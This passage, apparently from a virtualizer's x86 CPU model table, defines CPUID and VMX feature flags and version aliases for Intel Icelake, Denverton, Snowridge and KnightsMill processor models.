.features[FEAT_7_0_ECX] = CPUID_7_0_ECX_AVX512_VBMI | CPUID_7_0_ECX_UMIP | CPUID_7_0_ECX_PKU | CPUID_7_0_ECX_AVX512_VBMI2 | CPUID_7_0_ECX_GFNI | CPUID_7_0_ECX_VAES | CPUID_7_0_ECX_VPCLMULQDQ | CPUID_7_0_ECX_AVX512VNNI | CPUID_7_0_ECX_AVX512BITALG | CPUID_7_0_ECX_AVX512_VPOPCNTDQ, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_SPEC_CTRL_SSBD, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Core Processor (Icelake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Icelake-Client-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { NULL /* end of list */ } }, }, { 0 /* end of list */ } } }, { .name = "Icelake-Server", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 134, .stepping = 0, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_8000_0008_EBX] = CPUID_8000_0008_EBX_WBNOINVD, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512DQ | CPUID_7_0_EBX_AVX512BW | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512VL | CPUID_7_0_EBX_CLFLUSHOPT, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_AVX512_VBMI | CPUID_7_0_ECX_UMIP | CPUID_7_0_ECX_PKU | CPUID_7_0_ECX_AVX512_VBMI2 | CPUID_7_0_ECX_GFNI | CPUID_7_0_ECX_VAES | CPUID_7_0_ECX_VPCLMULQDQ | CPUID_7_0_ECX_AVX512VNNI | CPUID_7_0_ECX_AVX512BITALG | CPUID_7_0_ECX_AVX512_VPOPCNTDQ | CPUID_7_0_ECX_LA57, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_SPEC_CTRL_SSBD, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS, .xlevel = 0x80000008, .model_id = "Intel Xeon Processor (Icelake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Icelake-Server-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { NULL /* end of list */ } }, }, { .version = 3, .props = (PropValue[]) { { "arch-capabilities", "on" }, { "rdctl-no", "on" }, { "ibrs-all", "on" }, { "skip-l1dfl-vmentry", "on" }, { "mds-no", "on" }, { "pschange-mc-no", "on" }, { "taa-no", "on" }, { NULL /* end of list */ } }, }, { 0 /* end of list */ } } }, { .name = "Denverton", .level = 21, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 95, .stepping = 1, .features[FEAT_1_EDX] = CPUID_FP87 | CPUID_VME | CPUID_DE | CPUID_PSE | CPUID_TSC | CPUID_MSR | CPUID_PAE | CPUID_MCE | CPUID_CX8 | CPUID_APIC | CPUID_SEP | CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | CPUID_PSE36 | CPUID_CLFLUSH | CPUID_MMX | CPUID_FXSR | CPUID_SSE | CPUID_SSE2, .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16 | CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_X2APIC | CPUID_EXT_MOVBE | CPUID_EXT_POPCNT | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_AES | CPUID_EXT_XSAVE | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_SYSCALL | CPUID_EXT2_NX | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_LM, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_MPX | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT | CPUID_7_0_EBX_SHA_NI, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_ARCH_CAPABILITIES | CPUID_7_0_EDX_SPEC_CTRL_SSBD, /* * Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_ARCH_CAPABILITIES] = MSR_ARCH_CAP_RDCL_NO | MSR_ARCH_CAP_SKIP_L1DFL_VMENTRY, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Atom Processor (Denverton)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .props = (PropValue[]) { { "monitor", "off" }, { "mpx", "off" }, { NULL /* end of list */ }, }, }, { 0 /* end of list */ }, }, }, { .name = "Snowridge", .level = 27, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 134, .stepping = 1, .features[FEAT_1_EDX] = /* missing: CPUID_PN CPUID_IA64 */ /* missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ CPUID_FP87 | CPUID_VME | CPUID_DE | CPUID_PSE | CPUID_TSC | CPUID_MSR | CPUID_PAE | CPUID_MCE | CPUID_CX8 | CPUID_APIC | CPUID_SEP | CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | CPUID_PSE36 | CPUID_CLFLUSH | CPUID_MMX | CPUID_FXSR | CPUID_SSE | CPUID_SSE2, .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16 | CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_X2APIC | CPUID_EXT_MOVBE | CPUID_EXT_POPCNT | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_AES | CPUID_EXT_XSAVE | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_SYSCALL | CPUID_EXT2_NX | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_LM, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_MPX | /* missing bits 13, 15 */ CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_SHA_NI, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_UMIP | /* missing bit 5 */ CPUID_7_0_ECX_GFNI | CPUID_7_0_ECX_MOVDIRI | CPUID_7_0_ECX_CLDEMOTE | CPUID_7_0_ECX_MOVDIR64B, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_ARCH_CAPABILITIES | CPUID_7_0_EDX_SPEC_CTRL_SSBD | CPUID_7_0_EDX_CORE_CAPABILITY, .features[FEAT_CORE_CAPABILITY] = MSR_CORE_CAP_SPLIT_LOCK_DETECT, /* * Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Atom Processor (SnowRidge)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .props = (PropValue[]) { { "mpx", "off" }, { "model-id", "Intel Atom Processor (Snowridge, no MPX)" }, { NULL /* end of list */ }, }, }, { 0 /* end of list */ }, }, }, { .name = "KnightsMill", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 133, .stepping = 0, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SS | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512PF | CPUID_7_0_EBX_AVX512ER, 